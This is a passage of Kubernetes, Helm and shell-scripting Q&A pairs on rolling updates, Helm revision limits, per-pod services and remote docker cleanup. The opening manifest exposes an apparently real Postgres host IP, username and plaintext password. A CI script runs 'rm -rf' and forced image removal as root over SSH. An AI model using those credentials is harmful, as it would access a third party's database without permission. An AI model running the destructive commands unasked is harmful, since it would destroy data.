protected]:21343/quick-pay-db"},{"name":"PGHost","value":"173.255.206.177"},{"name":"PGUser","value":"postgres"},{"name":"PGDatabase","value":"quickpay"},{"name":"PGPassword","value":"z33shan"},{"name":"PGPort","value":"5432"}],"image":"gcr.io/quick-pay-208307/quickpay-dev-node:latest","imagePullPolicy":"Always","name":"dev-web-container","ports":[{"containerPort":2000}],"readinessProbe":{"failureThreshold":3,"httpGet":{"path":"/","port":2000,"scheme":"HTTP"},"initialDelaySeconds":5,"periodSeconds":5,"successThreshold":1,"timeoutSeconds":1},"resources":{"requests":{"cpu":"20m"}}}]}}}}
creationTimestamp: 2018-12-24T12:13:48Z
generation: 12
labels:
io.kompose.service: dev-web
name: dev-web
namespace: default
resourceVersion: "9631122"
selfLink: /apis/extensions/v1beta1/namespaces/default/deployments/web
uid: 5e66f7b3-0775-11e9-9653-42010a80019d
spec:
progressDeadlineSeconds: 600
replicas: 2
revisionHistoryLimit: 10
selector:
matchLabels:
io.kompose.service: web
strategy:
rollingUpdate:
maxSurge: 1
maxUnavailable: 0
type: RollingUpdate
template:
metadata:
creationTimestamp: null
labels:
io.kompose.service: web
spec:
containers:
- env:
- name: PORT
value: "2000"
image: gcr.io/myimagepath/web-node
imagePullPolicy: Always
name: web-container
ports:
- containerPort: 2000
protocol: TCP
readinessProbe:
failureThreshold: 10
httpGet:
path: /
port: 2000
scheme: HTTP
initialDelaySeconds: 10
periodSeconds: 10
successThreshold: 1
timeoutSeconds: 10
resources:
requests:
cpu: 10m
terminationMessagePath: /dev/termination-log
terminationMessagePolicy: File
dnsPolicy: ClusterFirst
restartPolicy: Always
schedulerName: default-scheduler
securityContext: {}
terminationGracePeriodSeconds: 30
status:
availableReplicas: 2
conditions:
- lastTransitionTime: 2019-01-03T05:49:46Z
lastUpdateTime: 2019-01-03T05:49:46Z
message: Deployment has minimum availability.
reason: MinimumReplicasAvailable
status: "True"
type: Available
- lastTransitionTime: 2018-12-24T12:13:48Z
lastUpdateTime: 2019-01-03T06:04:24Z
message: ReplicaSet "dev-web-7bd498fc74" has successfully progressed.
reason: NewReplicaSetAvailable
status: "True"
type: Progressing
observedGeneration: 12
readyReplicas: 2
replicas: 2
updatedReplicas: 2
</code></pre>
<p>I've tried with 1 replica and it still doesn't work.</p>
| <p>In the first scenario, Kubernetes deletes one pod (<code>maxUnavailable: 1</code>), starts a pod with the new image, and waits ~110 seconds (based on your readiness probe) to check whether the new pod is able to serve requests. The new pod isn't able to serve requests yet, but since it is in the Running state, Kubernetes deletes the second old pod and starts it with the new image as well, and again the second pod waits for the readiness probe to complete. This is why there is a window in which neither container is ready to serve requests, hence the downtime.</p>
<p>In the second scenario, where you have <code>maxUnavailable: 0</code>, Kubernetes first brings up a pod with the new image; it isn't able to serve requests within ~110 seconds (based on your readiness probe), so it times out and the new pod is removed. The same happens with the second pod. Hence neither of your pods gets updated.</p>
<p>So the root cause is that you are not giving your application enough time to come up and start serving requests. If you increase the value of <code>failureThreshold</code> in your readiness probe and keep <code>maxUnavailable: 0</code>, it will work.</p>
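<p>A sketch of the relevant pieces (treat the numbers as placeholders; they depend on how long your app actually takes to start):</p>
<pre><code>spec:
  strategy:
    type: RollingUpdate
    rollingUpdate:
      maxSurge: 1
      maxUnavailable: 0
  template:
    spec:
      containers:
      - name: web-container
        # ...
        readinessProbe:
          httpGet:
            path: /
            port: 2000
          initialDelaySeconds: 10
          periodSeconds: 10
          timeoutSeconds: 10
          failureThreshold: 30   # roughly 10s + 30*10s before the pod is given up on
</code></pre>
<p>With <code>maxSurge: 1</code> and <code>maxUnavailable: 0</code>, the new pod has to pass its readiness probe before an old one is terminated, which gives you a zero-downtime rollout.</p>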
|
<p>The command <code>helm history</code> prints a list of the past revisions for a release. Is there a limit to the size of this history? i.e. a number <code>n</code> such that if there are <code>n + 1</code> revisions then the first revision is no longer available? I'm aware of the <code>max</code> flag for the <code>helm history</code> command which limits the length of the list returned, so this question could be equivalently asked as: does the <code>max</code> flag have a limit for its value?</p>
<p>This is in the context of wanting to do a <code>helm rollback</code> - that command requires a revision and I want to confirm that there will never be a problem with Helm forgetting old revisions. </p>
<p>Thanks</p>
| <p>Yes. It does have a limit, if you look at the <a href="https://github.com/helm/helm/blob/master/cmd/helm/history.go#L61" rel="nofollow noreferrer">source code</a> (also <a href="https://github.com/helm/helm/blob/master/pkg/helm/option.go#L474" rel="nofollow noreferrer">here</a>) you see that it's defined as an <code>int32</code> in Golang.</p>
<p>Then, if you look at the <a href="https://golang.org/pkg/builtin/#int32" rel="nofollow noreferrer"><code>int32</code></a> docs for the built-in types, you see that its range is <code>-2147483648</code> through <code>2147483647</code>. In theory, you can specify <code>--max</code> on the helm command line as a positive number, so <code>2147483647</code> would be your limit. (Surprisingly, I don't see where the absolute value for the int32 gets generated.)</p>
<p>The <a href="https://github.com/helm/helm/blob/8be42bae885a04b4acc242cf420911145b32ee1c/cmd/helm/history.go#L34" rel="nofollow noreferrer">releaseInfo</a> structure has a memory footprint, so if you have a lot of releases you will run into a limit depending on how much memory you have on your system.</p>
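<p>In practice you will hit the memory limit long before the int32 one. For a rollback you just need the revision to still be listed (a usage sketch; the release name and revision number are placeholders):</p>
<pre><code># list up to 500 revisions of the release
helm history myrelease --max 500

# roll back to a specific revision from that list
helm rollback myrelease 42
</code></pre>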
|
<p>I have a Kubernetes scenario where I will need to deploy 3 Redis servers (pods), and each needs to be exposed with a ClusterIP service. Something like;</p>
<ul>
<li>RedisClusterIP1 -> RedisPod1 </li>
<li>RedisClusterIP2 -> RedisPod2</li>
<li>RedisClusterIP3 -> RedisPod3</li>
</ul>
<p>I have a deployment plan like the one below, but as you can see it creates the ClusterIP service manually and binds a single service to all the pods.</p>
<p>Is there any way to define the deployment so that it creates the same number of services as Pods?</p>
<p>I checked <a href="https://kubernetes.io/docs/concepts/workloads/controllers/deployment/" rel="nofollow noreferrer">deployments</a> and <a href="https://kubernetes.io/docs/concepts/workloads/controllers/replicaset/" rel="nofollow noreferrer">replica sets</a> but could not figure out whether something like this already exists.</p>
<pre><code>apiVersion: extensions/v1beta1
kind: Deployment
metadata:
name: redisharedis
spec:
replicas: 3
template:
metadata:
labels:
app: redisharedis
spec:
containers:
- name: redisharedis
image: aozdemir/redisharedis:v6
resources:
limits:
cpu: "1"
memory: "800Mi"
requests:
cpu: "0.1"
memory: "200Mi"
ports:
- containerPort: 6379
---
apiVersion: v1
kind: Service
metadata:
name: redisharedis-service
labels:
name: redisharedis-service
spec:
ports:
- port: 6379
targetPort: 6379
protocol: TCP
selector:
app: redisharedis
type: ClusterIP
</code></pre>
| <p>This can be done if you deploy your Redis cluster as a <code>StatefulSet</code> rather than a <code>Deployment</code>. In Kubernetes 1.9+, a StatefulSet automatically adds the Pod name as a label on each of its Pods, so you can enable Service-Per-Pod like this:</p>
<pre><code>apiVersion: apps/v1beta2
kind: StatefulSet
metadata:
annotations:
service-per-pod-label: "statefulset.kubernetes.io/pod-name"
service-per-pod-ports: "80:8080"
</code></pre>
<p>You need to install <code>Metacontroller</code> in your Kubernetes cluster to create one Service per Pod. Please refer to the following link for detailed instructions:</p>
<blockquote>
<p><a href="https://github.com/GoogleCloudPlatform/metacontroller/tree/master/examples/service-per-pod" rel="noreferrer">https://github.com/GoogleCloudPlatform/metacontroller/tree/master/examples/service-per-pod</a></p>
</blockquote>
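<p>If you prefer not to install Metacontroller, a more manual sketch is to create one Service per Pod yourself, selecting on the pod-name label that the StatefulSet adds automatically (names below are placeholders and assume a StatefulSet called <code>redisharedis</code>):</p>
<pre><code>apiVersion: v1
kind: Service
metadata:
  name: redisharedis-0
spec:
  type: ClusterIP
  selector:
    statefulset.kubernetes.io/pod-name: redisharedis-0
  ports:
  - port: 6379
    targetPort: 6379
    protocol: TCP
</code></pre>
<p>Repeat (or template) this for <code>redisharedis-1</code> and <code>redisharedis-2</code> to get one ClusterIP per Redis pod.</p>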
|
<p>I've installed a Kubernetes cluster using Rancher on 5 different CentOS nodes (let's say node1, node2, ..., node5). For our CI run, we need to clean up stale docker images before each run. I created a script that runs on node1, and password-less ssh is enabled from node1 to rest of the nodes. The relevant section of the script looks something like below:</p>
<pre><code>#!/bin/bash
helm ls --short --all | xargs -L1 helm delete --purge
echo "Deleting old data and docker images from Rancher host node."
rm -rf /var/lib/hadoop/* /opt/ci/*
docker images | grep localhost | awk '{print $3}' | xargs docker rmi -f
hosts=(node2 node3 node4 node5)
for host in ${hosts[*]}
do
echo "Deleting old data and docker images from ${host}"
ssh root@${host} docker images | grep localhost | awk '{print $3}' | xargs docker rmi -f
ssh root@${host} rm -rf /var/lib/hadoop/* /opt/ci/*
done
echo "All deletions are complete! Proceeding with installation."
sleep 2m
</code></pre>
<p>The problem is that while the <code>docker rmi</code> command inside the for loop runs for all the other 4 nodes, I get the error <code>Error: No such image: <image-id></code> for each of the images. But if I execute the same command on the node itself, it succeeds. I'm not sure what the issue is here. Any help is appreciated.</p>
| <p>The problem is that only the first command in the ssh pipeline is executed remotely:</p>
<pre><code>ssh root@${host} docker images | grep localhost | awk '{print $3}' | xargs docker rmi -f
</code></pre>
<p>The shell interprets it as</p>
<pre><code>ssh ssh-arguments | grep grep-arguments | awk awk-arguments | xarg xarg-arguments
</code></pre>
<p>As a result, only <code>docker images</code> is executed remotely. The output of the remote <code>docker images</code> is then transferred to the local machine, where it is filtered by <code>grep</code> and <code>awk</code>, and <code>docker rmi</code> is finally executed on the local machine.</p>
<p>It is necessary to add quotes to tell the shell that the whole pipeline is a single ssh argument. Note that <code>$3</code> also has to be escaped, otherwise the local shell would expand it before the command is sent to the remote host:</p>
<pre><code>ssh root@${host} "docker images | grep localhost | awk '{print \$3}' | xargs docker rmi -f"
</code></pre>
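<p>An alternative that sidesteps the quoting and escaping entirely is to ship the whole pipeline to the remote shell, for example via a quoted heredoc (a sketch):</p>
<pre><code>ssh root@${host} 'bash -s' <<'EOF'
docker images | grep localhost | awk '{print $3}' | xargs -r docker rmi -f
rm -rf /var/lib/hadoop/* /opt/ci/*
EOF
</code></pre>
<p>Because the heredoc delimiter is quoted, nothing inside it is expanded by the local shell, so <code>$3</code> reaches the remote <code>awk</code> untouched.</p>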
|